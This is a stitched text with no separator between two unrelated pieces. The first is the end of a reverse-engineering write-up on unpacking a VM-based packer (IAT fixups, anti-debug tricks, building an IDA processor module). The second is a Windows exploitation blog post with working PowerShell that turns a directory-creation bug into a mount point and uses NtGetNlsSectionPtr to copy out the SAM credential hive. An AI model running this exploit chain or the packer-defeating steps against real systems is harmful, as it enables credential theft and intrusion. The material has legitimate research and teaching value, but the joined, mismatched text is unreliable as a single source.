The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.

 

In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist — for example, here’s one that was in the Linux subsystem — but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.

 

For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.

 

A very simple vulnerable example you might see in a kernel driver looks like the following:

 

NTSTATUS KernelCreateDirectory(PHANDLE Handle,

                              PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);
 
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,

                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,

                    FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}

 

There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.

 

Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

If you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.

 

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new(«Unknown»,`
       0x800 bor $ControlCode, «Buffered», «Any»)
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}

 

The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.


It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.

Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?

Mount Point Abuse

If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?

 

If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.

Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?

National Language Support

Windows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:

 

NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,

                           DWORD CodePage,
                           PVOID *SectionPointer,

                           PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,

                            &section_name,
                            OBJ_KERNEL_HANDLE |

                            OBJ_OPENIF |

                            OBJ_CASE_INSENSITIVE |

                            OBJ_PERMANENT);
    
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,

                        SECTION_MAP_READ,

                        &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;

   OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;


   RtlpInitNlsFileName(NlsType,

                       CodePage,

                       &file_name);
   InitializeObjectAttributes(&obj_attr,

                              &file_name,
                              OBJ_KERNEL_HANDLE |

                              OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,

              &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,

                   &section_obj_attr, NULL,

                   PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(

                     section_handle,
                     SectionPointer,
                     SectionSize);
 ZwClose(section_handle);
 return status;
}

 

The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:


The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.

 

There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:

 

void RtlpInitNlsFileName(DWORD NlsType,

                        DWORD CodePage,

                        PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,

             L»\\SystemRoot\\System32\\c_%.3d.nls», CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
 }
}

 

The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.

 

I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.

 

File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.

 

But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.

 

So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.

 

$dir = «\SystemRoot\system32\c_1337.nls»
New-Directory $dir
 
$target_path = «\SystemRoot\system32\config\SAM»
Use-NtObject($file = Get-NtFile $dir `

            —Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =

    [NtApiDotNet.NtLocale]::GetNlsSectionPtr(«CodePage», 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite(«sam.bin»)) {
   $map.GetStream().CopyTo($output)
   Write-Host «Copied file»
 }
}

 

Loading the created file in a hex editor shows we did indeed steal the SAM file.


